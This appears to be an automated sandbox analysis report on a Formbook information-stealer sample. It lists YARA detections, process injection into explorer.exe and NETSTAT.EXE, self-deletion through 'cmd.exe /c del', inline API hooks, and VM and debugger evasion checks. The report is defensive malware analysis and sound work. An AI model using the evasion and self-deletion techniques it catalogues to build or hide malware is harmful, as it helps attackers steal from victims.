          Source: 2.2.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Y4U48592345670954.exe.2850000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Y4U48592345670954.exe.2850000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Y4U48592345670954.exe.2850000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Y4U48592345670954.exe.2850000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/3@4/2
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5692:120:WilError_01
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | File created: C:\Users\user\AppData\Local\Temp\nskA2DC.tmp
          Source: Y4U48592345670954.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: Y4U48592345670954.exe | Virustotal: Detection: 17%
          Source: Y4U48592345670954.exe | ReversingLabs: Detection: 16%
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | File read: C:\Users\user\Desktop\Y4U48592345670954.exe
          Source: unknown | Process created: C:\Users\user\Desktop\Y4U48592345670954.exe 'C:\Users\user\Desktop\Y4U48592345670954.exe'
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Process created: C:\Users\user\Desktop\Y4U48592345670954.exe 'C:\Users\user\Desktop\Y4U48592345670954.exe'
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Y4U48592345670954.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: netstat.pdbGCTL source: Y4U48592345670954.exe, 00000002.00000002.689406887.0000000000B10000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.668380838.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: Y4U48592345670954.exe, 00000002.00000002.689406887.0000000000B10000.00000040.00000001.sdmp
          Source: Binary string: C:\xampp\htdocs\Cryptor\def056c534cc4ea39c4345526c5ff6fa\Loader\Loader\Release\p2wf97kzy.pdb source: Y4U48592345670954.exe, 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp, yow0w7y8ovyw.dll.0.dr
          Source: Binary string: wntdll.pdbUGP source: Y4U48592345670954.exe, 00000000.00000003.652459500.000000001EF70000.00000004.00000001.sdmp, Y4U48592345670954.exe, 00000002.00000002.689550397.0000000000C6F000.00000040.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Y4U48592345670954.exe, NETSTAT.EXE
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.668380838.0000000005A00000.00000002.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Unpacked PE file: 2.2.Y4U48592345670954.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_004048E9 push ebp; retf
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00417138 push ecx; iretd
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_0040993B pushad ; retf
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_004169DF push eax; iretd
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_0041CEB5 push eax; ret
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_0041CF6C push eax; ret
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_0041CF02 push eax; ret
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_0041CF0B push eax; ret
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BCD0D1 push ecx; ret
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_1_004048E9 push ebp; retf
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_1_00417138 push ecx; iretd
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_1_0040993B pushad ; retf
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_1_004169DF push eax; iretd
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038BD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D548E9 push ebp; retf
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D669DF push eax; iretd
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D5993B pushad ; retf
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D67138 push ecx; iretd
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D6CEB5 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D6CF6C push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D6CF02 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D6CF0B push eax; ret
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | File created: C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xE1
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | RDTSC instruction interceptor: First address: 0000000000D598E4 second address: 0000000000D598EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | RDTSC instruction interceptor: First address: 0000000000D59B5E second address: 0000000000D59B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00409A90 rdtsc
          Source: C:\Windows\explorer.exe TID: 6616 | Thread sleep count: 39 > 30
          Source: C:\Windows\explorer.exe TID: 6616 | Thread sleep time: -78000s >= -30000s
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 4164 | Thread sleep time: -75000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 0_2_004026BC FindFirstFileA,
          Source: explorer.exe, 00000003.00000000.668267226.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.672700817.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000002.925108895.0000000006650000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.672797354.000000000A716000.00000004.00000001.sdmp | Binary or memory string: War&Prod_VMware_SATAa
          Source: explorer.exe, 00000003.00000000.667233392.0000000004710000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000003.00000000.668267226.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.672797354.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000003.00000000.668267226.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.667233392.0000000004710000.00000004.00000001.sdmp | Binary or memory string: #{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&f
          Source: explorer.exe, 00000003.00000000.672858468.000000000A784000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000003.00000000.668267226.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: explorer.exe, 00000003.00000000.676634834.000000000FD24000.00000004.00000001.sdmp | Binary or memory string: _VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process queried: DebugPort
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 0_2_6F731000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 0_2_02841699 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 0_2_028418B1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BAF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BAF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C0B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B79080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BF3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B758EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B8B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BF7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C32073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C41074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C44015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B90050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BF51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BF69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C041E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B9C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BAA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B7B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B94120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B94120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B79100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B7B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B7C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B9B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B8AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BAFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BAD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C3EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C04257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B7AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C2B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B93A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C48A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B75210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B75210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B88A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B79240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BAB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B81B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C2D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C3138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B9DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C45BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BF53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C48B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B7DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C3131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B7F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B7DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C48CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B8849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C314FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BF6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C0C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BABC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BF6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C4740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B9746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BAA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BAFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C3FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C28DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B8D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BF6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B7AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BFA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B97D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C48D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C2FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C48ED6 mov eax, dword ptr fs:[00000030h]
